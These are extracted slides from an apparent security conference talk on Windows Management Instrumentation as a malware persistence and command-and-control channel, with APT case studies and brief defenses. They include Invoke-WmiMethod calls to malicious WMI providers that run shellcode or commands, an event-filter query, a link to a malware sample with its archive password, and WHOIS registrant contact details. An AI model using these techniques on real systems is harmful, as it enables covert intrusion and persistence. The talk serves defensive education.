Windows Management instrumentation – A Front Door for malwares

Santhosh Kumar

Whoami

• Love to Break things apart. • Hobby Hacker.• Spoke at Various conferences including

DEFCON las Vegas, OWASP Appsec USA 2014, Bsides Las Vegas.

• Second time here.

Outline

• WM … What? • WMI malwares Timeline.• WMI Architecture• WQL• WMI providers.• WMI Eventing• Demo• Defenses

WM…what?

• System Management both remote and locally.• Deployed way back in NT4 and Windows 98/95.• Used to access registry,File System,network etc.• Eventing,Remoting and Remote Code execution • Endless possibilities.• Various tools support.• Own Query language.

Why Should i care?

WMI malware Timeline

• MS10-061 – Windows printer spooler • Attackers Dropped a MOF file to gain RCE.• Microsoft patched it in KB2347290 Update

http://poppopret.blogspot.in/2011/09/playing-with-mof-files-on-windows-for.html

Hammertoss APT (2015)

• Heavy reliance upon WMI and PowerShell ƒ

• Custom WMI class creation ƒ • WMI repository used to store payloads of

arbitrary size ĥ Results of commands added to WMI

object properties • https://www2.fireeye.com/rs/848-DID-242/i

mages/rpt-apt29-hammertoss.pdf

Syndicasec (2013-2015)

• 2 stage infection. • creates a TimerInstruction to raise a

custom event• Eventfilter is created to link to the

timerinstruction and EvilProviders• Everytime it is linked the consumer is

executed leaving to RCEhttp://www.welivesecurity.com/2013/05/23/syndicasec-in-the-sin-bin/

WMI architecture

• https://msdn.microsoft.com/en-us/library/aa394553(v=vs.85).aspx

Interaction with WMI

Interaction with wmi

Interaction with wmi

winrm

Interaction with wmi

• .net• Vbscript• Jscript• C/C++ via IWbem COM API • More utilities • http://passing-the-hash.blogspot.in/2013/0

4/missing-pth-tools-writeup-wmic-wmis-curl.html

WQL• Similar like SQL.Query for WMI objects,classes and

Namespaces.• Three types of query• Data Query• Event Query• Schema Query• Useful for RECON• https://msdn.microsoft.com/en-us/library/aa392902(v=vs.

85).aspx

WMI Recon

• Find installed Antivirus

WMI recon

• Find the Security Updates installed on the system

• Find if it is a VM

WMI providers

• Form the core working of WMI• Contains a DLL & MOF file for each

provider• Have the own listing of GUID for each

provider• %windir%\System32\Wbem• Sometimes there can be a custom wmi

providers

Malicous WMI providers• EvilWMIProvider by Casey Smith (@subTee) –

https://github.com/subTee/EvilWMIProvider • Invoke-WmiMethod -Class Win32_Evil -Name

ExecShellcode -ArgumentList @(0x90, 0x90, 0x90), $null

• EvilNetConnectionWMIProvider by Jared Atkinson (@jaredcatkinson) – https://github.com/jaredcatkinson/EvilNetConnectionWMI

• Invoke-WmiMethod -Class Win32_NetworkConnection - Name RunPs -ArgumentList 'whoami' , $null – Get-WmiObject -Class Win32_NetworkConnection

WMI eventing• Wmi can be used to monitor any type of Operating

system events.• Classified as two types• Intrinsic events• Extrinsic events• 3 requirement to define a event filter• Filter,consumer and binding• http://blogs.technet.com/b/heyscriptingguy/archive/2012/06/08/an-insider-s-guide-to-using-wmi-e

vents-and-powershell.aspx

Intrinsic Events

• Intrinsic events are system classes included in every namespace

• Monitor any changes to the class or namespace

• Should be executed within the polling interval

• https://technet.microsoft.com/en-us/library/ee156572.aspx

Extrinsic Events

• Use to monitor resources which is not included in CIM repository

ROOT\CIMV2:Win32_ComputerShutdownEvent ROOT\CIMV2:Win32_IP4RouteTableEvent ROOT\CIMV2:Win32_ProcessStartTrace ROOT\CIMV2:Win32_ModuleLoadTrace ROOT\CIMV2:Win32_ThreadStartTrace ROOT\CIMV2:Win32_VolumeChangeEvent ROOT\CIMV2:Msft_WmiProvider* ROOT\DEFAULT:RegistryKeyChangeEvent ROOT\DEFAULT:RegistryValueChangeEvent

Event Filter• Define which event to trigger• WMI query • Intrinsic Query • SELECT * FROM __InstanceOperationEvent WITHIN 30

WHERE ((__CLASS = "__InstanceCreationEvent" OR __CLASS = "__InstanceModificationEvent") AND TargetInstance ISA "CIM_DataFile") AND (TargetInstance.Extension = "doc") OR (TargetInstance.Extension = "docx")

• Extrinsic Query • SELECT * FROM Win32_VolumeChangeEvent WHERE

EventType = 2

Event Consumer

• Define what to do when event is called.• These are the standard event consumers:

LogFileEventConsumer ActiveScriptEventConsumer NTEventLogEventConsumer SMTPEventConsumer CommandLineEventConsumer

WMIGHOST apt• Targeting indian Users mainly military, energy and government

policy.• Infection via spear phishing attempt• Drops a unclassified government file like this

WMIGHOST (2014-2015)

• India US strategic dialouge press release.doc” (000150415302D7898F56D89C610DE4A9).

• Then drops if successful dw20.exe and gupdate.exe

https://github.com/ytisf/theZoo/tree/master/malwares/Binaries/WMIGhost

Password:infected

ShadowNet APT• This was detected this year during the tibetian uprising

day.• Group modified the toolchain to add WMI script for

gathering information and exfiltration.• Multi Layer C&C server and identifies victim using

encoded strings

Registrant Name: Kasong Dolma Registrant Street: New York Registrant City:New York Registrant State/Province:guangdong Registrant Postal Code:10001 Registrant Country:CN Registrant Phone:+1.9175608889 Registrant Email: mike.fly@email.com

WMI OFFENSIVE TOOLS

DEMO

• Acts like a Shell using WMI as C&C.• Uses Namespaces for Storing the data.• Uses Base64 encoding to store the data in

the namespace to avoid firewall and endpoints

• Decodes Base64 data on attacker machine

Defenses

• Don’t enable WMI Remoting? • More strict Firewall Rules• permanent WMI event subscriptions • Custom Event logs.

Books

References• http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp__und

erstanding-wmi-malware.pdf• http://www.welivesecurity.com/2013/05/23/syndicasec-in-the-sin-bin/• https://github.com/ytisf/theZoo/tree/master/malwares/Binaries/WMIGhost• https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf• http://2014.hackitoergosum.org/slides/day1_WMI_Shell_Andrei_Dumitrescu.pdf• https://msdn.microsoft.com/en-us/library/aa394582(v=vs.85).aspx• https://msdn.microsoft.com/en-us/library/bg126473(v=vs.85).aspx• https://msdn.microsoft.com/en-us/library/aa394554(v=vs.85).aspx• http://blogs.technet.com/b/heyscriptingguy/archive/2012/06/08/an-insider-s-guide-to-using-

wmi-events-and-powershell.aspx• http://www.codeproject.com/Articles/28226/Creating-WMI-Permanent-Event-Subscriptions-

Using-M• http://ytisf.github.io/theZoo/• https://dl.mandiant.com/EE/library/MIRcon2014/

MIRcon_2014_IR_Track_There's_Something_About_WMI.pdf•